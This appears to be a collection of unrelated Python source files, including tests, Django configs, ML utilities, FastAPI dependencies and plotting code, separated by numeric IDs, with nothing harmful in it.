did_collide = self._act("move_forward", math.sqrt(rel_x ** 2 + rel_y ** 2))
if did_collide:
print("Error: Collision accured while moving straight!")
return False
# rotate to match the final yaw!
(cur_x, cur_y, cur_yaw) = self.get_state()
rel_yaw = abs_yaw - cur_yaw
# clip to micro-degree precision to preserve determinism
if abs(rel_yaw) < 1e-4:
rel_yaw = 0
action_name = "turn_left"
if rel_yaw < 0.0:
action_name = "turn_right"
rel_yaw *= -1
did_collide = self._act(action_name, math.degrees(rel_yaw))
if did_collide:
print("Error: Collision accured while rotating!")
return False
return True
def track_trajectory(self, states, controls, close_loop):
"""
State trajectory that the robot should track.
:param states: sequence of (x,y,t) states that the robot should track.
:param controls: optionally specify control sequence as well.
:param close_loop: whether to close loop on the
computed control sequence or not.
:type states: list
:type controls: list
:type close_loop: bool
:return: True if successful; False otherwise (timeout, etc.)
:rtype: bool
"""
raise NotImplementedError
|
15148
|
class BaseHandler:
def send(self, data, p):
pass
def recv(self, data, p):
pass
def shutdown(self, p, direction=2):
pass
def close(self):
pass
|
15187
|
import os
from os.path import dirname
from unittest import TestCase
import src.superannotate as sa
class TestCloneProject(TestCase):
PROJECT_NAME_1 = "test create from full info1"
PROJECT_NAME_2 = "test create from full info2"
PROJECT_DESCRIPTION = "desc"
PROJECT_TYPE = "Vector"
TEST_FOLDER_PATH = "data_set/sample_project_vector"
@property
def folder_path(self):
return os.path.join(dirname(dirname(__file__)), self.TEST_FOLDER_PATH)
@property
def classes_json(self):
return f"{self.folder_path}/classes/classes.json"
def setUp(self, *args, **kwargs):
self.tearDown()
self._project_1 = sa.create_project(
self.PROJECT_NAME_1, self.PROJECT_DESCRIPTION, self.PROJECT_TYPE
)
def tearDown(self) -> None:
sa.delete_project(self.PROJECT_NAME_1)
sa.delete_project(self.PROJECT_NAME_2)
def test_clone_contributors_and_description(self):
team_users = sa.search_team_contributors()
sa.share_project(self.PROJECT_NAME_1, team_users[0], "QA")
first_project_metadata = sa.get_project_metadata(
self.PROJECT_NAME_1, include_contributors=True
)
first_project_contributors = first_project_metadata["contributors"]
sa.clone_project(self.PROJECT_NAME_2, self.PROJECT_NAME_1, "DESCRIPTION", copy_contributors=True)
second_project_metadata = sa.get_project_metadata(
self.PROJECT_NAME_2, include_contributors=True
)
second_project_contributors = second_project_metadata["contributors"]
self.assertEqual(first_project_contributors[0]["user_id"], second_project_contributors[0]["user_id"])
self.assertEqual("DESCRIPTION", second_project_metadata["description"])
|
15194
|
import pytest
def vprintf_test(vamos):
if vamos.flavor == "agcc":
pytest.skip("vprintf not supported")
vamos.run_prog_check_data("vprintf")
|
15203
|
from django.conf.urls import patterns, url, include
from django.contrib import admin
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from .views import template_test
urlpatterns = patterns(
'',
url(r'^test/', template_test, name='template_test'),
url(r'^test2/', include('testapp.another_urls', namespace='foo', app_name='faa'))
)
admin.autodiscover()
urlpatterns += patterns(
'',
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
import debug_toolbar
urlpatterns += patterns(
url(r'^__debug__/', include(debug_toolbar.urls)),
)
|
15208
|
import pytest
from rlo import factory
@pytest.mark.parametrize("use_subtree_match_edges", [True, False])
@pytest.mark.parametrize("loss", ["pinball=0.6", "huber"])
def test_torch_model_from_config(use_subtree_match_edges, loss):
# Check we can construct a Model
config = {
"num_embeddings": 3,
"hidden_dim": 2,
"num_gnn_blocks": 5,
"output_hidden_dim": 2,
"simulation_depth_train": 10,
"lr": 0.01,
"loss": loss,
"repetition": 1,
"decoder_readout": "sum",
"graph_state_keep_prob": 0.9,
"output_keep_prob": 0.2,
"aggregation_over_edge_types": "sum",
"use_subtree_match_edges": use_subtree_match_edges,
}
factory.torch_model_from_config(config)
@pytest.mark.parametrize("use_subtree_match_edges", [True, False])
def test_torch_data_converter_from_config(use_subtree_match_edges):
# Check we can construct a DataConverter
config = {
"simulation_depth_train": 11,
"use_subtree_match_edges": use_subtree_match_edges,
"cost_normalization": "none",
}
factory.data_converter_from_config(config)
@pytest.mark.parametrize("use_subtree_match_edges", [True, False])
@pytest.mark.parametrize("loss", ["pinball=0.3", "huber"])
def test_torch_regressor_from_config(use_subtree_match_edges, loss):
# Check we can construct a TorchModelWrapper
config = {
"num_embeddings": 3,
"hidden_dim": 2,
"num_gnn_blocks": 5,
"output_hidden_dim": 2,
"lr": 0.01,
"loss": loss,
"repetition": 1,
"use_subtree_match_edges": use_subtree_match_edges,
"cost_normalization": "none",
"tensorflow": False,
"simulation_depth_eval": 10,
"decoder_readout": "sum",
"graph_state_keep_prob": 0.99,
"output_keep_prob": 0.2,
"aggregation_over_edge_types": "sum",
"simulation_depth_train": 10,
}
factory.single_regressor_from_config(config)
|
15269
|
import csv
import os
import shutil
from datetime import datetime
from grid import *
#from cluster import *
from regions import *
start_time = datetime.now()
print("Allocating...")
#grid2
#gridSystem = GridSystem(-74.04, -73.775, 5, 40.63, 40.835, 5)
#gridname = "grid2"
#grid3
#gridSystem = GridSystem(-74.02, -73.938, 4, 40.7, 40.815, 6)
#gridname = "grid3"
#cluster1
#gridSystem = ClusterSystem("cluster1/clusters.csv")
#gridname = "cluster1"
gridSystem = RegionSystem("4year_features")
gridname = "region1"
invalids = 0
for y in ["FOIL2010", "FOIL2011", "FOIL2012", "FOIL2013"]:
for n in range(1,13):
filename = "../../new_chron/" + y + "/trip_data_" + str(n) + ".csv"
print("Reading file " + filename)
r = csv.reader(open(filename, "r"))
i = 0
header = True
for line in r:
if(header):
Trip.initHeader(line)
header = False
else:
trip = None
try:
trip = Trip(line)
except ValueError:
invalids += 1
if(trip!= None and (y!="FOIL" + str(trip.date.year) or n!= trip.date.month)):
trip.has_other_error = True
gridSystem.record(trip)
i += 1
if(i%1000000==0):
print("Read " + str(i) + " rows")
gridSystem.close()
end_time = datetime.now()
program_duration = end_time - start_time
print("Processing took " + str(program_duration))
|
15278
|
from lib import action
class RGBAction(action.BaseAction):
def run(self, light_id, red, green, blue, transition_time):
light = self.hue.lights.get(light_id)
light.rgb(red, green, blue, transition_time)
|
15290
|
from collections import defaultdict, namedtuple
import torch
# When using the sliding window trick for long sequences,
# we take the representation of each token with maximal context.
# Take average of the BERT embeddings of these BPE sub-tokens
# as the embedding for the word.
# Take *weighted* average of the word embeddings through all layers.
def extract_bert_ques_hidden_states(all_encoder_layers, max_doc_len, features, weighted_avg=False):
num_layers, batch_size, turn_size, num_chunk, max_token_len, bert_dim = all_encoder_layers.shape
out_features = torch.Tensor(num_layers, batch_size, turn_size, max_doc_len, bert_dim).fill_(0)
device = all_encoder_layers.get_device() if all_encoder_layers.is_cuda else None
if device is not None:
out_features = out_features.to(device)
token_count = []
# Map BERT tokens to doc words
for i, ex_feature in enumerate(features): # Example
ex_token_count = []
for t, para_feature in enumerate(ex_feature): # Turn
para_token_count = defaultdict(int)
for j, chunk_feature in enumerate(para_feature): # Chunk
for k in chunk_feature.token_is_max_context: # Token
if chunk_feature.token_is_max_context[k]:
doc_word_idx = chunk_feature.token_to_orig_map[k]
out_features[:, i, t, doc_word_idx] += all_encoder_layers[:, i, t, j, k]
para_token_count[doc_word_idx] += 1
ex_token_count.append(para_token_count)
token_count.append(ex_token_count)
for i, ex_token_count in enumerate(token_count):
for t, para_token_count in enumerate(ex_token_count):
for doc_word_idx, count in para_token_count.items():
out_features[:, i, t, doc_word_idx] /= count
# Average through all layers
if not weighted_avg:
out_features = torch.mean(out_features, 0)
return out_features
def extract_bert_ctx_hidden_states(all_encoder_layers, max_doc_len, features, weighted_avg=False):
num_layers, batch_size, num_chunk, max_token_len, bert_dim = all_encoder_layers.shape
out_features = torch.Tensor(num_layers, batch_size, max_doc_len, bert_dim).fill_(0)
device = all_encoder_layers.get_device() if all_encoder_layers.is_cuda else None
if device is not None:
out_features = out_features.to(device)
token_count = []
# Map BERT tokens to doc words
for i, ex_feature in enumerate(features): # Example
ex_token_count = defaultdict(int)
for j, chunk_feature in enumerate(ex_feature): # Chunk
for k in chunk_feature.token_is_max_context: # Token
if chunk_feature.token_is_max_context[k]:
doc_word_idx = chunk_feature.token_to_orig_map[k]
out_features[:, i, doc_word_idx] += all_encoder_layers[:, i, j, k]
ex_token_count[doc_word_idx] += 1
token_count.append(ex_token_count)
for i, ex_token_count in enumerate(token_count):
for doc_word_idx, count in ex_token_count.items():
out_features[:, i, doc_word_idx] /= count
# Average through all layers
if not weighted_avg:
out_features = torch.mean(out_features, 0)
return out_features
def convert_text_to_bert_features(text, bert_tokenizer, max_seq_length, doc_stride):
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
tok_to_orig_index = []
all_doc_tokens = []
for (i, token) in enumerate(text):
sub_tokens = bert_tokenizer.wordpiece_tokenizer.tokenize(token.lower())
for sub_ in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_)
# The -2 accounts for [CLS] and [SEP]
max_tokens_for_doc = max_seq_length - 2
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = namedtuple( # pylint: disable=invalid-name
"DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
out_features = []
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index,
split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
input_ids = bert_tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
feature = BertInputFeatures(
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids)
out_features.append(feature)
return out_features
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
class BertInputFeatures(object):
"""A single set of BERT features of data."""
def __init__(self,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids):
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
|
15317
|
from django.db import models
from django.contrib.auth.models import User
class Link(models.Model):
url = models.URLField()
title = models.CharField(max_length=255)
reporter = models.ForeignKey(
User,
on_delete=models.SET_NULL,
related_name='reported_links',
null=True,
blank=False,
)
def __str__(self):
return '{self.title} ({self.url})'.format(self=self)
def get_num_of_positive_votes(self):
return self.votes.filter(positive=True).count()
def get_num_of_negative_votes(self):
return self.votes.filter(negative=True).count()
class LinkVote(models.Model):
class Meta:
unique_together = (
('link', 'voter'),
)
link = models.ForeignKey(
Link,
on_delete=models.CASCADE,
related_name='votes',
)
voter = models.ForeignKey(
User,
on_delete=models.SET_NULL,
related_name='votes',
null=True,
blank=False,
)
positive = models.BooleanField()
negative = models.BooleanField()
def __str__(self):
if self.positive:
vote = 'positive'
elif self.negative:
vote = 'negative'
else:
vote = 'neutral'
return '{vote} vote for {self.link} by {self.voter}'.format(
vote=vote, self=self)
|
15319
|
from prometheus_client import Counter
from raiden.utils.typing import TokenAmount
from raiden_libs.metrics import ( # noqa: F401, pylint: disable=unused-import
ERRORS_LOGGED,
EVENTS_EXCEPTIONS_RAISED,
EVENTS_PROCESSING_TIME,
MESSAGES_EXCEPTIONS_RAISED,
MESSAGES_PROCESSING_TIME,
REGISTRY,
ErrorCategory,
MetricsEnum,
collect_event_metrics,
collect_message_metrics,
get_metrics_for_label,
)
class Who(MetricsEnum):
US = "us"
THEY = "they"
REWARD_CLAIMS = Counter(
"economics_reward_claims_successful_total",
"The number of overall successful reward claims",
labelnames=[Who.label_name()],
registry=REGISTRY,
)
REWARD_CLAIMS_TOKEN = Counter(
"economics_reward_claims_token_total",
"The amount of token earned by reward claims",
labelnames=[Who.label_name()],
registry=REGISTRY,
)
def report_increased_reward_claims(amount: TokenAmount, who: Who) -> None:
get_metrics_for_label(REWARD_CLAIMS, who).inc()
get_metrics_for_label(REWARD_CLAIMS_TOKEN, who).inc(float(amount))
|
15346
|
from pathlib import Path
import shutil
import unittest
import numpy as np
import siml.optimize as optimize
import siml.setting as setting
class TestOptimize(unittest.TestCase):
def test_generate_dict(self):
main_setting = setting.MainSetting.read_settings_yaml(
Path('tests/data/deform/optuna.yml'))
objective = optimize.Objective(main_setting, None)
dict_replace_1 = {
'inputs': [{'name': 'abc', 'dim': 6}],
'n_node': 35,
'hidden_layers': 11,
'dropout': 0.01}
replaced_setting_1 = objective._generate_dict(
main_setting.optuna.setting, dict_replace_1)
dict_replace_2 = {
'inputs': [
{'name': 'elemental_strain', 'dim': 6},
{'name': 'something', 'dim': 100}],
'n_node': 135,
'hidden_layers': 111,
'dropout': 0.11}
replaced_setting_2 = objective._generate_dict(
main_setting.optuna.setting, dict_replace_2)
self.assertEqual(
replaced_setting_1['trainer']['inputs'][0]['name'],
'abc')
self.assertEqual(
replaced_setting_2['trainer']['inputs'][0]['name'],
'elemental_strain')
self.assertEqual(
replaced_setting_2['trainer']['inputs'][1]['name'],
'something')
self.assertEqual(
replaced_setting_2['model']['blocks'][0]['hidden_nodes'], 135)
self.assertEqual(
replaced_setting_2['model']['blocks'][0]['hidden_layers'], 111)
self.assertEqual(
replaced_setting_2['model']['blocks'][0]['hidden_dropout'], 0.11)
def test_perform_study(self):
main_setting = setting.MainSetting.read_settings_yaml(
Path('tests/data/deform/optuna.yml'))
if main_setting.optuna.output_base_directory.exists():
shutil.rmtree(main_setting.optuna.output_base_directory)
study = optimize.Study(main_setting)
study.perform_study()
self.assertLess(
study.study.best_trial.value,
np.max([t.value for t in study.study.trials]))
def test_perform_study_step_by_step(self):
main_setting_yml = Path('tests/data/deform/optuna.yml')
main_setting = setting.MainSetting.read_settings_yaml(
main_setting_yml)
if main_setting.optuna.output_base_directory.exists():
shutil.rmtree(main_setting.optuna.output_base_directory)
db_setting = setting.DBSetting(use_sqlite=True)
study = optimize.Study(main_setting, db_setting, step_by_step=True)
for _ in range(3):
try:
study.perform_study()
except SystemExit:
continue
self.assertEqual(len(study.study.get_trials()), 3)
|
15354
|
from fastapi import Depends, HTTPException, Path, status
from pydantic import UUID4
from api.dependencies.database import get_repository
from db.errors import EntityDoesNotExist, ResourceIsNotDeployed
from db.repositories.user_resources import UserResourceRepository
from db.repositories.workspace_services import WorkspaceServiceRepository
from db.repositories.workspaces import WorkspaceRepository
from models.domain.user_resource import UserResource
from models.domain.workspace import Workspace
from models.domain.workspace_service import WorkspaceService
from resources import strings
def get_workspace_by_id(workspace_id: UUID4, workspaces_repo) -> Workspace:
try:
return workspaces_repo.get_workspace_by_id(workspace_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.WORKSPACE_DOES_NOT_EXIST)
async def get_workspace_by_id_from_path(workspace_id: UUID4 = Path(...), workspaces_repo=Depends(get_repository(WorkspaceRepository))) -> Workspace:
return get_workspace_by_id(workspace_id, workspaces_repo)
async def get_deployed_workspace_by_id_from_path(workspace_id: UUID4 = Path(...), workspaces_repo=Depends(get_repository(WorkspaceRepository))) -> Workspace:
try:
return workspaces_repo.get_deployed_workspace_by_id(workspace_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.WORKSPACE_DOES_NOT_EXIST)
except ResourceIsNotDeployed:
raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail=strings.WORKSPACE_IS_NOT_DEPLOYED)
async def get_workspace_service_by_id_from_path(workspace_id: UUID4 = Path(...), service_id: UUID4 = Path(...), workspace_services_repo=Depends(get_repository(WorkspaceServiceRepository))) -> WorkspaceService:
try:
return workspace_services_repo.get_workspace_service_by_id(workspace_id, service_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.WORKSPACE_SERVICE_DOES_NOT_EXIST)
async def get_deployed_workspace_service_by_id_from_path(workspace_id: UUID4 = Path(...), service_id: UUID4 = Path(...), workspace_services_repo=Depends(get_repository(WorkspaceServiceRepository))) -> WorkspaceService:
try:
return workspace_services_repo.get_deployed_workspace_service_by_id(workspace_id, service_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.WORKSPACE_SERVICE_DOES_NOT_EXIST)
except ResourceIsNotDeployed:
raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail=strings.WORKSPACE_SERVICE_IS_NOT_DEPLOYED)
async def get_user_resource_by_id_from_path(workspace_id: UUID4 = Path(...), service_id: UUID4 = Path(...), resource_id: UUID4 = Path(...), user_resource_repo=Depends(get_repository(UserResourceRepository))) -> UserResource:
try:
return user_resource_repo.get_user_resource_by_id(workspace_id, service_id, resource_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.USER_RESOURCE_DOES_NOT_EXIST)
|
15427
|
from typing import List
class Solution:
def findOcurrences(self, text: str, first: str, second: str) -> List[str]:
ls = text.split()
return [c for a, b, c in zip(ls, ls[1:], ls[2:]) if a == first and b == second]
|
15505
|
import unittest
from katas.kyu_7.binary_addition import add_binary
class AddBinaryTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(add_binary(1, 1), '10')
def test_equals_2(self):
self.assertEqual(add_binary(0, 1), '1')
def test_equals_3(self):
self.assertEqual(add_binary(1, 0), '1')
def test_equals_4(self):
self.assertEqual(add_binary(2, 2), '100')
def test_equals_5(self):
self.assertEqual(add_binary(51, 12), '111111')
|
15516
|
import random
import numpy as np
import operator
from scipy import optimize
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg
from matplotlib.figure import Figure as MatplotlibFigure
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm as color_map
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import interface.auxiliary_functions as auxi
import dictionaries.constants as cs
#################################################################################
class ResultsCanvas(FigureCanvasQTAgg):
def __init__(self, canvas_ref, vip):
self._Figure = MatplotlibFigure(figsize = cs.FIG_SIZE, dpi = cs.DPI)#, tight_layout=True, frameon=True)
super(ResultsCanvas, self).__init__(self._Figure)
self.update_figure(canvas_ref, vip)
def _from_options(self, canvas_ref, vip):
self.Axes.set_position(self._get_axes_position(vip))
labels_x = self.Axes.xaxis.get_ticklabels()
labels_y = self.Axes.yaxis.get_ticklabels()
fontsize = vip.get('Options', 'R_axes_font_size')
angle = vip.get('Options', 'R_x_plot_label_rotation')
for label in labels_x+labels_y:
label.set_fontsize(fontsize)
if vip.get(canvas_ref, 'F_plot_function') == 'density':
for label in labels_x:
label.set_rotation(angle)
def _get_axes_position(self, vip):
session_keys = ['R_x_plot_position', 'R_y_plot_position', 'R_x_plot_size', 'R_y_plot_size']
f = lambda k: float(vip.get('Options', k))
return map(f, session_keys)
#################################################################################
class Canvas2dData(ResultsCanvas):
def __init__(self, canvas_ref, vip):
super(Canvas2dData, self).__init__(canvas_ref, vip)
def update_figure(self, canvas_ref, vip):
self._Figure.clear()
#from numpy.random import rand
#x, y, c, s = rand(4, 100)
#def onpick3(event):
# ind = event.ind
# print 'onpick3 scatter:', ind, np.take(x_axis, ind), np.take(y_axis, ind)
#self._Figure.canvas.mpl_connect('pick_event', onpick3)
try:
data_set = vip.get(canvas_ref, 'F_data_set')
plot_data2D = vip.plot_data[data_set]['2d_data']
########## Axes
self.Axes = self._Figure.add_axes(cs.AXES_POSITION_INIT)
x_axis = plot_data2D['axis_1']
y_axis = plot_data2D['axis_r']
self.Axes.plot(x_axis, y_axis, auxi.colour(cs.PLOT_COLOR_RANGE))
#self.Axes.set_xlim([x_axis[0], x_axis[-1]])
self.Axes.set_xlim(sorted([x_axis[0], x_axis[-1]]))
self._from_options(canvas_ref, vip)
self.Axes.set_xlabel(plot_data2D['label_1'])
self.Axes.set_ylabel(plot_data2D['label_r'])
#self.Axes.hold(False)
########## Extrema
#max_index, max_y = max(enumerate(y_axis), key=operator.itemgetter(1))
#vip.maximal_x = x_axis[max_index]
min_index, min_y = min(enumerate(y_axis), key=operator.itemgetter(1))
vip.minimal_x = x_axis[min_index]
print "* GLOBAL MINIMUM:\n{0}".format(vip.minimal_x)
if canvas_ref in ['Plot_column_1']:
########## Savitzky Golay Filter
ws = len(y_axis)/cs.SAVITZKY_GOLAY_FILTER_RANGE_DENOMINATOR
ws = ws if (ws % 2 == 1) else (ws + 1)
try:
y_axis_sg = auxi.savitzky_golay_filter(y_axis, window_size=ws, order=cs.SAVITZKY_GOLAY_FILTER_ORDER)
self.Axes.plot(x_axis, y_axis_sg, cs.FILTER_CURVE_STYLE, linewidth=cs.FILTER_LINEWIDTH)
except TypeError as exception:
print "! (update_figure) couldn't compute 'savitzky_golay_filter':"
print exception
########## Fit
try:
def lorenzian_fit(x, A, k, ke):
"""Take min_x of this session and define a fit function"""
def h(ke_):
return (k / 2 - ke_)**2 + (x - vip.minimal_x)**2
r = A * h(ke) / h(0)
return auxi.to_dB(r)
parameters, covariance = optimize.curve_fit(lorenzian_fit, x_axis, y_axis_sg)
LINE = 40 * "." + "\n"
print LINE
print "LORENZIAN FIT AT FILTER CUVE MINIMUM:\n"
print "* PARAMETERS:\n\n [A, kappa, kappa_e]\n= {0}\n".format(parameters)
print "* PARAMETERS:\n\n kappa_e / kappa\n= {0}\n" .format(parameters[1] / parameters[0])
print "* COVARIANCE:\n\n Matrix\n= {0}\n" .format(covariance)
print "* MINIMUM: \n\n (x,y)\n= ({0}, {1})\n" .format(x_axis[min_index], y_axis[min_index])
print LINE
fit_function = lambda x: lorenzian_fit(x, *parameters)
y_axis_fit = map(fit_function, x_axis)
self.Axes.plot(x_axis, y_axis_fit, cs.FITTING_CURVE_STYLE, linewidth=cs.FITTING_LINEWIDTH, linestyle=cs.FITTING_LINESTYLE)
except:
print "! (update_figure) couldn't fit to lorenzian_fit."
else:
pass
try:
self.draw()
except ValueError:
message = "! (update_figure, ValueError) at vip.draw."
vip.GUI_feedback(message)
except KeyError:
message = "! (update_figure) The specified dataset might not exist."
vip.GUI_feedback(message)
#################################################################################
class Canvas3dData(ResultsCanvas):
def __init__(self, canvas_ref, vip):
super(Canvas3dData, self).__init__(canvas_ref, vip)
def update_figure(self, canvas_ref, vip):
self._Figure.clear()
try:
data_set = vip.get(canvas_ref, 'F_data_set')
plot_data3D = vip.plot_data[data_set]['3d_data']
########## Axes
X, Y = np.meshgrid(plot_data3D['axis_1'], plot_data3D['axis_2'])
Z = np.array(plot_data3D['axis_r'])
if vip.get(canvas_ref, 'F_plot_function') == 'density':
self.Axes = self._Figure.add_axes(cs.AXES_POSITION_INIT)
self.Axes.pcolormesh(X, Y, Z, cmap = color_map.coolwarm)
elif vip.get(canvas_ref, 'F_plot_function') == 'surface':
self.Axes = Axes3D(self._Figure)
surf = self.Axes.plot_surface(X, Y, Z, cmap = color_map.coolwarm, rstride = 1, cstride = 1, linewidth = 0.15, antialiased = False)
self.Axes.zaxis.set_major_locator(LinearLocator(10))
self.Axes.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
#self.Axes.set_zlim(-1.01, 1.01)
position_color_bar = [0.015, 0.17, 0.015, 0.75]
Axes_color_bar = self._Figure.add_axes(position_color_bar)
self._Figure.colorbar(surf, cax = Axes_color_bar)
self._from_options(canvas_ref, vip)
#self.Axes.hold(False)
self.Axes.set_xlabel(plot_data3D['label_1'])
self.Axes.set_ylabel(plot_data3D['label_2'])
########## / Axes
try:
self.draw()
except ValueError:
message = "(update_figure, vip.draw, ValueError)"
vip.GUI_feedback(message)
except KeyError:
message = "The specified dataset might not exist"
vip.GUI_feedback(message)
|
15555
|
import os
from .default import DefaultModelConfig
class ModelConfig(DefaultModelConfig):
def __init__(self):
super().__init__()
self.MODEL_NAME = 'AOTT'
|
15563
|
print(list(range(10, 0, -2)))
# if start > end and step > 0:
# a list generated from start to no more than end with step as constant increment
# if start > end and step < 0:
# an empty list generated
# if start < end and step > 0:
# an empty list generated
# if start < end and step < 0
# a list generated from start to no more than end with step as constant decrement
|
15592
|
from pgdrive.component.blocks.curve import Curve
from pgdrive.component.blocks.first_block import FirstPGBlock
from pgdrive.component.blocks.std_t_intersection import StdTInterSection
from pgdrive.component.blocks.straight import Straight
from pgdrive.component.road.road_network import RoadNetwork
from pgdrive.tests.vis_block.vis_block_base import TestBlock
if __name__ == "__main__":
test = TestBlock(True)
from pgdrive.engine.asset_loader import initialize_asset_loader
initialize_asset_loader(test)
global_network = RoadNetwork()
first = FirstPGBlock(global_network, 3.0, 2, test.render, test.world, 1)
curve = Curve(1, first.get_socket(0), global_network, 1)
curve.construct_block(test.render, test.world)
straight = Straight(2, curve.get_socket(0), global_network, 1)
straight.construct_block(test.render, test.world)
intersection = StdTInterSection(3, straight.get_socket(0), global_network, 1)
print(intersection.construct_block(test.render, test.world))
id = 4
for socket_idx in range(intersection.SOCKET_NUM):
block = Curve(id, intersection.get_socket(socket_idx), global_network, id + 1)
block.construct_block(test.render, test.world)
id += 1
test.show_bounding_box(global_network)
test.run()
|
15638
|
from foolbox import zoo
import numpy as np
import foolbox
import sys
import pytest
from foolbox.zoo.model_loader import ModelLoader
from os.path import join, dirname
@pytest.fixture(autouse=True)
def unload_foolbox_model_module():
# reload foolbox_model from scratch for every run
# to ensure atomic tests without side effects
module_names = ["foolbox_model", "model"]
for module_name in module_names:
if module_name in sys.modules:
del sys.modules[module_name]
test_data = [
# private repo won't work on travis
# ('https://github.com/bethgelab/AnalysisBySynthesis.git', (1, 28, 28)),
# ('https://github.com/bethgelab/convex_adversarial.git', (1, 28, 28)),
# ('https://github.com/bethgelab/mnist_challenge.git', 784)
(join("file://", dirname(__file__), "data/model_repo"), (3, 224, 224))
]
@pytest.mark.parametrize("url, dim", test_data)
def test_loading_model(url, dim):
# download model
model = zoo.get_model(url)
# create a dummy image
x = np.zeros(dim, dtype=np.float32)
x[:] = np.random.randn(*x.shape)
# run the model
logits = model.forward_one(x)
probabilities = foolbox.utils.softmax(logits)
predicted_class = np.argmax(logits)
# sanity check
assert predicted_class >= 0
assert np.sum(probabilities) >= 0.9999
# TODO: delete fmodel
def test_non_default_module_throws_error():
with pytest.raises(RuntimeError):
ModelLoader.get(key="other")
|
15691
|
import numpy as np
from ctapipe.core import Component
from ctapipe.containers import MuonRingContainer
from .fitting import kundu_chaudhuri_circle_fit, taubin_circle_fit
import traitlets as traits
# the fit methods do not expose the same interface, so we
# force the same interface onto them, here.
# we also modify their names slightly, since the names are
# exposed to the user via the string traitlet `fit_method`
def kundu_chaudhuri(x, y, weights, mask):
"""kundu_chaudhuri_circle_fit with x, y, weights, mask interface"""
return kundu_chaudhuri_circle_fit(x[mask], y[mask], weights[mask])
def taubin(x, y, weights, mask):
"""taubin_circle_fit with x, y, weights, mask interface"""
return taubin_circle_fit(x, y, mask)
FIT_METHOD_BY_NAME = {m.__name__: m for m in [kundu_chaudhuri, taubin]}
__all__ = ["MuonRingFitter"]
class MuonRingFitter(Component):
"""Different ring fit algorithms for muon rings"""
fit_method = traits.CaselessStrEnum(
list(FIT_METHOD_BY_NAME.keys()),
default_value=list(FIT_METHOD_BY_NAME.keys())[0],
).tag(config=True)
def __call__(self, x, y, img, mask):
"""allows any fit to be called in form of
MuonRingFitter(fit_method = "name of the fit")
"""
fit_function = FIT_METHOD_BY_NAME[self.fit_method]
radius, center_x, center_y = fit_function(x, y, img, mask)
return MuonRingContainer(
center_x=center_x,
center_y=center_y,
radius=radius,
center_phi=np.arctan2(center_y, center_x),
center_distance=np.sqrt(center_x ** 2 + center_y ** 2),
)
|
15695
|
from django.conf import settings
from django.conf.urls import *
from django.conf.urls.static import static
from django.contrib import admin
from django.contrib.sitemaps.views import sitemap
from django.views.decorators.cache import cache_page
from django.views.generic import TemplateView
from ajax_select import urls as ajax_select_urls
from .views import (
HomeView, CustomSearchView, autocomplete, ErrorView, BibliographieView,
RssFeed, GlobalSitemap,
)
